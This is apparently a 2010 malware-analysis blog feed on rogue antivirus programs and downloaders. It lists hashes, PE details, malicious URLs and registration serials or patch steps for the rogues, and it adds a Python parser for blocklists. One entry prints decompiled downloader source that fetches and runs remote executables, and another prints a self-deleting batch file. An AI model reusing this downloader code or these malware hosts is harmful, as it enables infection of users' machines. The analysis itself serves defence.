XyliBox
Malware Analysis

Welcome to Xylibox, a project whose aim is to analyse all types of malware.
You can report abuse using the appropriate form and view the list of potentially dangerous sites reported by other users.

Contact: /Xylitol

[Stay secure] Prevent malware


[Xylibox] Malware notification 2010/06/22 - Security Central (Rogue)
  • Location: http://my-security-central.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 942080 (0E6000h) Byte(s)
  • Packer: Unknown
  • EP: 000010B0
  • EP Offset: 000010B0
  • EP Section: .text
  • Linker: 6.0
  • SHA1: 8567C73FA5E704295176F7B26829878C20435140
  • Additional info: Security Central is a fake Antivirus tool. It is from the same rogue family as Home Personal Antivirus, XP Deluxe Protector, Win PC Antivirus, Win PC Defender, XP Police Antivirus, IE-Security, WinDefender 2009 and Total Secure 2009.
    If your PC is infected with this, run MBAM to remove the infection.


  • mail: phoenixbytes@live.fr
    serial: X84HW8D55UFUGST


    Once registered, Security Central doesn't detect infections anymore (same system, no cleaning).
    There are no more fake alerts and disturbing warning messages...
    Easy proof of a scareware application.
    If your PC is infected with Security Central, use MBAM to remove the infection.

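Added here as a worked example (not code from the Xylibox page): a small parser for the notification layout used throughout this feed. It reads the "Localisation"/"Location", "File Type : Exe, Size : N (Xh) Byte(s)", "EP Offset" and "SHA1: hash (name)" bullets, cross-checks the decimal size against the hex size, checks that the entry-point offset lies inside the file, and lowercases the hashes so they can go straight into a blocklist. The first two sample records are copied from entries on this page; the third is constructed, with a deliberate size mismatch and an unusable hash, to show what the consistency checks catch.

```python
"""Normalize Xylibox-style malware notifications into IoC records (added example)."""
import re
from urllib.parse import urlparse

# Two records copied from the notifications on this page, plus one constructed
# record ("[Constructed]") with a deliberate size mismatch and an unusable hash.
SAMPLE_RECORDS = """\
[Xylibox] Malware notification 2010/06/22 - Security Central (Rogue)
  • Localisation: http://my-security-central.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 942080 (0E6000h) Byte(s)
  • Packer: Unknown
  • EP: 000010B0
  • EP Offset: 000010B0
  • EP Section: .text
  • Linker: 6.0
  • SHA1: 8567C73FA5E704295176F7B26829878C20435140

[Xylibox] Malware notification 2010/06/19 - XP Antivirus (Rogue, cracking session)
  • Location: http://xpantivirus.com/
  • File Type : Exe, Size : 463872 (071400h) Byte(s)
  • Packer: UPX
  • EP: 00154FB0
  • EP Offset: 000573B0
  • EP Section: UPX1
  • SHA1: A11D3F8B0899FB27AFDD61A37800288457EA01B5 (xpa.exe)

[Constructed] Malware notification 2010/01/01 - example.exe (constructed test record)
  • Location: www.example.invalid/dl/example.exe
  • File Type : Exe, Size : 1000 (3E7h) Byte(s)
  • EP Offset: 00000800
  • SHA1: error
"""

HEADER_RE = re.compile(r"^\[(?P<src>[^\]]+)\] Malware notification (?P<date>\d{4}/\d{2}/\d{2}) - (?P<title>.+)$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?)\s*:\s*(?P<value>.*)$")
SIZE_RE = re.compile(r"Size\s*:\s*(?P<dec>\d+)\s*\((?P<hex>[0-9A-Fa-f]+)h\)")
SHA1_RE = re.compile(r"^(?P<hash>[0-9A-Fa-f]{40})(?:\s*\((?P<name>[^)]+)\))?")


def parse_records(text):
    """Split the feed into one dict per notification header, with a 'problems' list."""
    records, cur = [], None
    for line in text.splitlines():
        h = HEADER_RE.match(line.strip())
        if h:
            cur = {"date": h["date"], "title": h["title"], "problems": []}
            records.append(cur)
            continue
        f = FIELD_RE.match(line)
        if cur is None or not f:
            continue
        key, value = f["key"].strip().lower(), f["value"].strip()
        if key in ("localisation", "location"):
            cur["url"] = value
        elif key == "file type":
            s = SIZE_RE.search(value)
            if s:
                cur["size"] = int(s["dec"])
                if int(s["hex"], 16) != cur["size"]:  # decimal and hex sizes must agree
                    cur["problems"].append(f"size mismatch: {s['dec']} != 0x{s['hex']}")
        elif key == "sha1":
            s = SHA1_RE.match(value)
            if s:
                cur["sha1"] = s["hash"].lower()
                if s["name"]:
                    cur["filename"] = s["name"]
            else:  # e.g. the "SHA1: error" fields in some entries
                cur["problems"].append(f"unusable SHA1 field: {value!r}")
        elif key == "packer":
            cur["packer"] = value
        elif key in ("ep", "ep offset"):
            cur[key.replace(" ", "_")] = int(value, 16)
    for r in records:
        if "size" in r and "ep_offset" in r and r["ep_offset"] >= r["size"]:
            r["problems"].append("entry point offset lies outside the file")
    return records


def hostname(url):
    """Host part of a URL, tolerating the scheme-less form several entries use."""
    if "://" not in url:
        url = "http://" + url
    return urlparse(url).hostname


def blocklist(records):
    """Return (sorted sha1 list, sorted host list) from records that parsed cleanly."""
    clean = [r for r in records if not r["problems"]]
    hashes = sorted(r["sha1"] for r in clean if "sha1" in r)
    hosts = sorted({hostname(r["url"]) for r in clean if "url" in r})
    return hashes, hosts


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for r in recs:
        print(r["date"], r["title"], r.get("sha1"), r["problems"])
    print(blocklist(recs))
```

Records with any problem are kept out of the blocklist rather than silently fixed, so a transcription error in a hash or size never propagates into a detection rule.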



[Xylibox] Malware notification 2010/06/21 - flash_player.exe [Updated] (Ransomware, cracking session)
  • Location: http://apornovideo.ru/flash_player.exe
  • Original Name: Unknown
  • File Type : Exe, Size : 135168 (021000h) Byte(s)
  • Packer: Unknown
  • EP: 000010DD
  • EP Offset: 000004DD
  • EP Section: .text
  • Linker: 6.0
  • SHA1: d8d1860b9f11263b502cc5d91c9775fcddc5c630
  • Additional info: When executed, it makes a copy of itself in /%ALLUSERSPROFILE%/Media/ under the name "movies.exe"; a batch file called "rdb.bat" is also dropped there.
    The ransomware displays an invasive message box in Russian and blocks some applications like taskmgr, regedit etc...
    If your PC is infected with this, run MBAM to remove the infection.


  • First serial to enter: 62907349
    Second serial: 49752406





[Xylibox] Malware notification 2010/06/20 - XP Antivirus 2008 (Rogue, cracking session)
  • Location: http://www.avxp2008.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 9462272 (0906200h) Byte(s)
  • Packer: Custom
  • EP: 00005C61
  • EP Offset: 00005C61
  • EP Section: .text
  • Linker: 7.10
  • SHA1: 7d081a1053cd9ef3d593f5ef9a27303824b779f5 (rhc90dj0et2n.exe)
  • Additional info: XP Antivirus 2008 is a fake security software (rogue).
    It displays fake alerts to justify an infection to incite users into buying a license.
    Same family as Desktop Security 2010, i.e. the same key check.
    If your PC is infected with XP Antivirus 2008, run MBAM to remove the infection.


  • Patching way:
    1) Make a breakpoint on 0043E907
    2) Enter any serial
    3) Change the value 00 on DS:[01365d20] by 01
    4) Enjoy





[Xylibox] Malware notification 2010/06/20 - flash_player.exe (Ransomware, cracking session)
  • Location: I've lost the link ¬.¬
  • A small thanks to Siri for the IRC channel; you're doing great work with your malware bots, keep it up :]
  • Original Name: Unknown
  • File Type : Exe, Size : 68608 (010C00h) Byte(s)
  • Packer: Unknown
  • EP: 00001066
  • EP Offset: 00000466
  • EP Section: .text
  • Linker: 8.0
  • SHA1: 293c853735e3df483453e4659d70ca955674c4ba
  • Additional info: When executed, it makes a copy of itself in /%ALLUSERSPROFILE%/Media/ under the name "movies.exe"; a batch file called "rdb.bat" is also dropped there.
    The ransomware displays an invasive message box in Russian and blocks some applications like taskmgr, regedit etc...
    If your PC is infected with this, run MBAM to remove the infection.


  • First serial to enter: 28527548
    Second serial: 35676549





[Xylibox] Malware notification 2010/06/20 - Anti-Virus Number-1 (Rogue)
  • Location: http://70.38.11.165/
  • Original Name: Unknown
  • File Type : Exe, Size : 11122688 (0A9B800h) Byte(s)
  • Packer: Unknown
  • EP: 000353CC
  • EP Offset: 000347CC
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 3588D0F572311BF80906C0072BBB75D78EB88A72 (n1.exe)
  • Additional info: Antivirus-1 is a rogue from February 2009 (fake security software).
    It belongs to the same family as Total Virus Protection, Antivirus Sentry, Antivirus 2010, Micro Antivirus 2009, MS Antivirus, Smart Antivirus 2009, System Antivirus 2008, Antivirus 2009 and Internet-antivirus.
    If your PC is infected with Anti-Virus Number-1, use MBAM to remove the infection.


  • Email: phoenixbytes@live.fr
    Serial: 873465112334272 or 78629310938





[Xylibox] Malware notification 2010/06/19 - XP Antivirus (Rogue, cracking session)
  • Location: http://xpantivirus.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 463872 (071400h) Byte(s)
  • Packer: UPX
  • EP: 00154FB0
  • EP Offset: 000573B0
  • EP Section: UPX1
  • Linker: 2.25
  • SHA1: A11D3F8B0899FB27AFDD61A37800288457EA01B5 (xpa.exe)
  • Additional info: XP Antivirus is a fake security software (rogue).
    It displays fake alerts to justify an infection to incite users into buying a license.
    If your PC is infected with XP Antivirus, use MBAM to remove the infection.

  • The serial check was done on the server and the server is dead, so there is no key.
    We can't register this rogue,
    so patch it:
    00497FFA . /0F85 29020000 JNZ 00498229 -> NOP this line!
    Then the work is done.
    Also some other good news: this is a stupid rogue.
    The rogue just checks whether there is a registry entry about the registration; it doesn't care if the serial is good or bad :)
    So, regfile the shit:

    REGEDIT4

    [HKEY_CURRENT_USER\Software\XP antivirus\Options]
    "FirstRunUrl"="http://www.traffic-converter.biz/firstrun.php?product=%product%&aff=%aff%&email=%email%&update=%update%&os=%os%"
    "AfterRegisterUrl"="http://www.traffic-converter.biz/afterreg.php?product=%product%&aff=%aff%&email=%email%&update=%update%&os=%os%"
    "LabelUrl"=""
    "TermsUrl"="http://www.XPAntivirus.com/eula.php"
    "HelpURL"="http://xpantivirus.com/help.php"
    "BillingURL"="https://secure.sweeptransact.com/Billing/API/CheckLicense.aspx?Email=%email%&TransactionKey=%transactionkey%&AffiliateID=%aff%"
    "BillingUrlApproved"="https://secure.sweeptransact.com/Billing/API/CheckLicense.aspx?Email=%email%&TransactionKey=%transactionkey%&AffiliateID=%aff%&RegistrationCompleted=1"
    "TransactionKey"="XsHrUGEutblgVFNM"
    "BillingRegURL"="http://xpantivirus.com/register.php"
    "SecurityVector"="000000000"
    "Scans"="1"
    "LastScan"="17.06.2010 22:15:50"
    "Transaction"="DD40A8C75F668A0D4F026372D827A75A"
    "RegEmail"="phoenixbytes@live.fr"
    "RegCode"="Fuck the key !"






[Xylibox] Malware notification 2010/06/19 - Green AV (Rogue)
  • Location: http://www.my-green-av-pre.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 753664 (0B8000h) Byte(s)
  • Packer: Unknown
  • EP: 00A85B23
  • EP Offset: 000ABF23
  • EP Section: 3
  • Linker: 6.0
  • SHA1: 1943A0682A58CF07568B30215134103B565E6183 (rwg.exe)
  • Additional info: Green AV is another fake security software (rogue).
    It displays fake alerts to justify an infection to incite users into buying a license.
    It belongs to the same family as: AntivirusBEST, Eco Antivirus 2010, Total Virus Protection, Anti-Virus Number-1, Antivirus Sentry, Antivirus 2010, Micro Antivirus 2009, MS Antivirus, Smart Antivirus 2009, System Antivirus 2008, Antivirus 2009, Internet-antivirus.
    If your PC is infected with Green AV, use MBAM to remove the infection.

  • Email: phoenixbytes@live.fr
    Serial: WZlJ3RzVncpa05WQg4





[Xylibox] Malware notification 2010/06/18 - Antivirus Plus (Rogue, cracking session)
  • Location: http://antivirusplus1.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 2370560 (0242C00h) Byte(s)
  • Packer: Unknown
  • EP: 0000E71C
  • EP Offset: 0000DB1C
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 997C4D37E4FB33DBD6FCBF8942C6210E17B88211 (AntiVirus Plus.1.exe)
  • Additional info: AntivirusPlus is another fake security software (rogue).
    This scareware is not new, but it was not very active.
    Recently, more fake online scanners advertise Antivirus Plus as a removal tool.

    The rogue detects a lot of infections (all non-existent); once registered, it proposes to remove them.
    If we don't accept (ALT-F4 to quit), they have all disappeared on the next execution.
    Email: phoenixbytes@live.fr
    Serial: 9827569362578384 or 8748349485784030




    If your PC is infected with Antivirus Plus use MBAM to remove the infection.

[Xylibox] Malware notification 2010/06/18 - Antivirus 2009 (Rogue)
  • Location: http://secured-liveupdate.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 1478656 (0169000h) Byte(s)
  • Packer: Unknown
  • EP: 00001296
  • EP Offset: 00001296
  • EP Section: .text
  • Linker: 11.14
  • SHA1: 7D5C84DB2732CB2E3EFDDF04C8DB3976D27759ED (av2009.exe)
  • Additional info: The Antivirus 2009 rogue replaces the original SP2 Security Center with its own.
  • It is from the Anti200X family: Live Security Suite, Live Entreprise Suite, Personal Security, Cyber Security, AntivirusBest, Total Security, Total Virus Protection, Anti-Virus Number-1, Antivirus 360, Antivirus Sentry, Internet Antivirus Pro, PC Protection Center 2008, Antivirus 2010, eAntivirusPro, AntiMalware 2009, Micro Antivirus 2009, XPert Antivirus, Power Antivirus, Advanced Antivirus, MS Antivirus
    Email: phoenixbytes@live.fr
    Serial: 0429682-95N-LKSJDLKJ53Y09




    If your PC is infected with Security Master AV use MBAM or SmitfraudFix to remove the infection.

[Xylibox] Malware notification 2010/06/18 - Security Master AV (Rogue, cracking session #4)
  • Location: http://www5.securitymasterav.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 2048512 (01F4200h) Byte(s)
  • Packer: Custom
  • EP: 00004390
  • EP Offset: 00003790
  • EP Section: .code
  • Linker: 7.0
  • SHA1: 6495438eae6482317b8cc57ef42782b232efdfe4 (SM511e.exe)
  • Additional info: Security Master AV is a fake Antivirus from May. This rogue drops files on the system and detects them as infected to scare users; the files are filled with junk data and do not represent a risk.
    It is in the same family as: My Security Engine, Security Guard, CleanUp Antivirus and Security Antivirus.

  • Serial: UEPB-H4KA-S2LA-U2FD

    This rogue was damn hard to crack.


    Security Master AV comes from fake online scanners and porn sites.
    If your PC is infected with Security Master AV use MBAM to remove the infection.

[Xylibox] Malware notification 2010/06/17 - AntivirusBEST (Rogue, cracking session #3)
  • Location: http://70.38.11.165/admin/cgi-bin/get_domain.php?type=download
  • Original Name: Unknown
  • File Type : Exe, Size : 11345408 (0AD1E00h) Byte(s)
  • Packer: Custom
  • EP: 000371C3
  • EP Offset: 000365C3
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 334B7B9A10369F991530613E90652241D13539F7 (abest.exe)
  • Additional info: Antivirus Best is a fake security software (rogue). It displays fake alerts to justify an infection to incite users into buying a license.
    It belongs to the same family as: Eco Antivirus 2010, Total Virus Protection, Anti-Virus Number-1, Antivirus Sentry, Antivirus 2010, Micro Antivirus 2009, MS Antivirus, Smart Antivirus 2009, System Antivirus 2008, Antivirus 2009, Internet-antivirus.


  • Email: phoenixbytes@live.fr
    Serial: 873465112334272 or 78629310938



    If your PC is infected with AntivirusBEST, use MBAM to remove the infection.

[Xylibox] Malware notification 2010/06/17 - Eco Antivirus 2010 (Rogue, cracking session #2)
  • Location: http://www.eco-av.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 750076 (0B71FCh) Byte(s)
  • Packer: Custom
  • EP: 00A40080
  • EP Offset: 0009B880
  • EP Section: .ultra
  • Linker: 9.0
  • SHA1: CB6CAB7217103CBEDE81578BF94E51367AC2C2C8 (msv.exe)
  • Additional info: Eco Antivirus 2010 displays a lot of disturbing warning messages pushing users to purchase a license.

  • Name: XyliboxFrance
    Serial: 7755-3334-8977-1235-5555



    If your PC is infected with Eco Antivirus 2010 rogue, use MBAM to remove the infection.

[Xylibox] Malware notification 2010/06/16 - Desktop Security 2010 (Rogue, cracking session #1)
  • Location: http://www.windesktopsecurity2010.com/
  • Original Name: Unknown
  • File Type : Exe, Size : 3235840 (0316000h) Byte(s)
  • Packer: Custom
  • EP: 00003F1D
  • EP Offset: 0000331D
  • EP Section: .CODE
  • Linker: 2.25
  • SHA1: 9b53d9d031d62b2baf1efbeaad5fa55981efa61a (Desktop Security 2010.exe)
  • Additional info: Desktop Security 2010 displays a lot of disturbing warning messages pushing users to purchase a license.


    If your PC is infected with Desktop Security 2010 rogue, use MBAM to remove the infection.
    Advised by a colleague.

[Xylibox] Malware notification 2010/06/13 - File Name: soft.exe
  • Location: http://www.ie6browsers.info/2/index.php
  • Original Name: Unknown
  • File Type : Exe, Size : 367147 (059A2Bh) Byte(s)
  • Packer: UPX [unknown / modified] compressed !
  • EP: 000B0DE0
  • EP Offset: 0003C1E0
  • EP Section: .UPX1
  • Linker: 9.0
  • Additional info: Compiled Script: AutoIt v3 Script: 3, 3, 6, 1
  • SHA1: a56028294c53c56925c9bf0ba3984d6bb1ad8290

  • ####[UNPACKED]####
  • File Type : Exe, Size : 725035 (0B102Bh) Byte(s)
  • EP: 00016310
  • EP Offset: 00015710
  • EP Section: .text
    Text strings referenced in soft:.text, item 534
  • Additional info:
    Address=00431AA4
    Disassembly=PUSH 004846D8
    Text string=ASCII "This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support."
    Navigate to: "http://lab.l4ever.cn/ip/Api/"
    Navigate to: "http://db.union.download.kingsoft.com/union/union/DUBA2011_down_31_18466.exe" (Chinese AV)
  • Decompiled Source code:
    #NoTrayIcon
    FileInstall("1.exe", @TempDir & "\" & @ScriptName)
    $TXT = ""
    For $T = 1 To 10
        $USERN1 = ""
        For $U = 1 To 6
            $USERN1 = $USERN1 & Chr(Random(97, 122, 1))
        Next
        $USERN2 = ""
        For $U = 1 To 4
            $USERN2 = $USERN2 & Random(0, 9, 1)
        Next
        $USERN3 = ""
        For $U = 1 To Random(1, 3, 1)
            $USERN3 = $USERN3 & Chr(Random(65, 90, 1))
        Next
        $TXT = $TXT & $USERN1 & $USERN2 & $USERN3 & @CRLF
    Next
    FileWrite(@TempDir & "\" & @ScriptName, $TXT)
    RunWait(@TempDir & "\" & @ScriptName)
    FileDelete(@TempDir & "\" & @ScriptName)
    $A06E0C0522A = 0
    FileDelete(@TempDir & "\900210122.idx")
    $A1AE0E02A5C = InetGet("http://lab.l4ever.cn/ip/Api/", @TempDir & "\900210122.idx", 1, 0)
    If @error Then
        $A06E0C0522A = 1
    Else
        $A11E0F04E51 = FileReadLine(@TempDir & "\900210122.idx", 1)
        ;### Tidy Error: If/ElseIf statement without a then..
        If StringInStr($A11E0F04E51, "
    Nwm") OR STRINGINSTR($A11E0F04E51, " _lς") THEN
            $A06E0C0522A = 1
        Else
        EndIf
        FileDelete(@TempDir & "\900210122.idx")
    EndIf
    If $A06E0C0522A = 0 Then
        FileInstall("forqd125.exe", @AppDataCommonDir & "\forqd125.exe")
        RunWait(@AppDataCommonDir & "\forqd125.exe")
        $OPENWEB = "http://121.10.107.50/11.html?kaishi"
        Run(@ComSpec & " /c " & "start " & $OPENWEB, "", @SW_HIDE)
        Local $A23F000291E = InetGet("http://db.union.download.kingsoft.com/union/union/DUBA2011_down_31_18466.exe", @AppDataCommonDir & "\DUBA2011_down_31_18466.exe", 1, 1)
        Do
            Sleep(250)
        Until INETGETINFO($A23F000291E, 2)
        Local $A30F010363F = INETGETINFO($A23F000291E, 0)
        INETCLOSE($A23F000291E)
        Run(@AppDataCommonDir & "\DUBA2011_down_31_18466.exe")
        WinWaitActive("Ñ'q\Òk8—2

  • Name: 1.exe
  • File Type : Exe, Size : 163840 (028000h) Byte(s)
  • Packer: Unknown
  • EP: 00004772
  • EP Offset: 00004772
  • EP Section: .text
  • Linker: 6.0
  • Additional info: Downloader/Loader
  • SHA1: 7c3260f22f5b69b8e18308c8bc91a3e448b4f43a
  • Navigates to: http://www.my8899.com/ - http://www.2345.com/tg10.htm - http://www.2345.com/css/sd_1.css
  • The following directories were created:
    /%ProgramFiles%/SogouInput
    /%ProgramFiles%/SogouInput/5.0.0.3787
    /%ProgramFiles%/Winrar

    4 files were created in /%ProgramFiles%/SogouInput/5.0.0.3787 (all files are the same):
    cgi-bin.knl:
    StockP.knl: (Firstly located in /%temp%/ with the name "winrar.knl")
    Wrapper.knl:
    Obfuscated.knl (This file was deleted after)

    Decoded them for a bit:

  • The following Registry Keys are created:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.knl
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.qc
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\CLSID
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shell
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shell\open
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shell\open\command
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shellex
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\DefaultIcon
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\ScriptEngine
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Edit
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Edit\Command
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Open
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Open\Command
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Open2
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Open2\Command
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Print
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\Shell\Print\Command
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\ShellEx
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\ShellEx\DropHandler
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\ShellEx\PropertySheetHandlers
    • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wFile\ShellEx\PropertySheetHandlers\WSHProps
    • HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host
    • HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings
    A shortcut "Internet Explorer" was added to the desktop.
    Internet Explorer home page changed to "http://www.my8899.com/".
  • Creates a .bat file:
    @echo off
    :err
    del /f /q C:\DOCUME~1\ADMINI~1\Bureau\1.exe
    if exits C:\DOCUME~1\ADMINI~1\Bureau\1.exe goto err
    del %0


  • Name: forqd125.exe [CLEAN] (Chinese program PPTV downloader)
  • File Type : Exe, Size : 58832 (0E5D0h) Byte(s)
  • Packer: Unknown
  • EP: 000047F0
  • EP Offset: 000047F0
  • EP Section: .text
  • Linker: 6.0
  • Additional info: Downloader
  • SHA1: 2e9d113d7053e70a88257d25574414ccffad1713
  • Downloads a clean Chinese program

  • Name: pplivesetup_forqd125.exe [CLEAN] (Chinese program PPTV Setup)
  • File Type : Exe, Size : 10748552 (0A40288h) Byte(s)
  • Packer: Nullsoft SFX Setup v2.46
  • EP: 000033AD
  • EP Offset: 000027AD
  • EP Section: .text
  • Linker: 9.0
  • Additional info: Installer, SFX
  • SHA1: 9245bff38c9cb1327585846e0c60aa529951916c


[Xylibox] Malware notification 2010/06/13 - GuardSoft, Ltd: Defense Center (Rogue)
  • Location: http://edsprofit.com/customers/installer.php?pid=DEFCNT_BASIC
  • Original filename: Unknown
  • File Type : Exe, Size : 93696 (016E00h) Byte(s)
  • Packer: Unknown
  • EP: 00001004
  • EP Offset: 00000404
  • EP Section: .text
  • Linker: 9.0
  • SHA1: e595025ad2b2c7d9ee2c544c644a545b45684600
  • Additional info: Rogue... nothing new.

    Regfile:

    REGEDIT4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Defense Center]

    "License"="94804860143697233939975370329435970097710202"
    "Email"="phoenixbytes@live.fr"

    If your PC is infected with Defense Center use MBAM to remove the infection.

    Exe fix WinXP/Vista:

    Windows Registry Editor Version 5.00

    [HKEY_CLASSES_ROOT\.EXE]
    @="exefile"
    "Content Type"="application/x-msdownload"

    [HKEY_CLASSES_ROOT\.EXE\PersistentHandler]
    @="{098f2470-bae0-11cd-b579-08002b30bfeb}"

    [HKEY_CLASSES_ROOT\exefile]
    @="Application"
    "EditFlags"=hex:38,07,00,00
    "FriendlyTypeName"=hex(2):40,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,\
      00,6f,00,6f,00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,\
      32,00,5c,00,73,00,68,00,65,00,6c,00,6c,00,33,00,32,00,2e,00,64,00,6c,00,6c,\
      00,2c,00,2d,00,31,00,30,00,31,00,35,00,36,00,00,00

    [HKEY_CLASSES_ROOT\exefile\DefaultIcon]
    @="%1"

    [HKEY_CLASSES_ROOT\exefile\shell]

    [HKEY_CLASSES_ROOT\exefile\shell\open]
    "EditFlags"=hex:00,00,00,00

    [HKEY_CLASSES_ROOT\exefile\shell\open\command]
    @="\"%1\" %*"
    "IsolatedCommand"="\"%1\" %*"

    [HKEY_CLASSES_ROOT\exefile\shell\runas]

    [HKEY_CLASSES_ROOT\exefile\shell\runas\command]
    @="\"%1\" %*"
    "IsolatedCommand"="\"%1\" %*"

    [HKEY_CLASSES_ROOT\exefile\shellex]

    [HKEY_CLASSES_ROOT\exefile\shellex\DropHandler]
    @="{86C86720-42A0-1069-A2E8-08002B30309D}"

    [-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice]




[Xylibox] Malware notification 2010/06/12 - File Name: ie.exe
  • Location: www.eyx8.com/down/ie.exe
  • Original filename: Unknown
  • File Type : Exe, Size : 53248 (0D000h) Byte(s)
  • Packer: Unknown
  • EP: 000017D4
  • EP Offset: 000017D4
  • EP Section: .text
  • Linker: 6.0
  • SHA1: error
  • Additional info: Creates many registry keys:
    HKEY_CLASSES_ROOT\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_CURRENT_USER\Software\Classes\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500\Software\Classes\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500_Classes\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
    HKEY_USERS\S-1-5-21-73586283-790525478-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel




[Xylibox] Malware notification 2010/06/12 - File Name: Browser_Update.exe
  • Location: www.intercinema.ru/Browser_Update.exe
  • Original filename: Unknown
  • File Type : Exe, Size : 48640 (0BE00h) Byte(s)
  • Packer: Unknown
  • EP: 000006E4
  • EP Offset: 000006E4
  • EP Section: .text
  • Linker: 6.0
  • SHA1: error
  • Additional info: Anti-debug at 0x4006FA; nop the shit.
    Creates registry key: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Main - DEPOff:1
    Creates 0041.DLL in /system32/
    Modifies many registry values related to 0041.DLL
    Creates a file WORK.DAT in the same folder (/system32/)
    Opens RegSvr32.exe and registers 0041.DLL silently; the DLL decrypts "WINLOGON, IEXPLORE, FIREFOX"
    and after that I had some problems continuing to debug it...




[News] Malware notification 2010/06/08 - File Name: spb.exe, Asprox Botnet, The Resurrection.


    Asprox, a spambot we have not seen active for over a year... now back.

  • Location: www.ursagates.co.uk/templates/rt_solarsentinel_j15/images/body/white/spb.exe (spb for SPamBot?)
  • Original filename: Unknown
  • File Type : Exe, Size : 92672 (016A00h) Byte(s)
  • Packer: UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]
  • SHA1: 9ff6ddc475d5041b6fa0ed7b5795b95520ff4e75

  • ####[UNPACKED]####
  • File Type : Exe, Size : 117248 (01CA00h) Byte(s)
  • EP: 0000A900
  • EP Offset: 00009D00
  • EP Section: .code
  • Linker: 10.0
  • Additional info: Creates a lot of new registry keys; new files appear:
    /%TEMP%/_check32.bat
    /%System%/aspimgr.exe

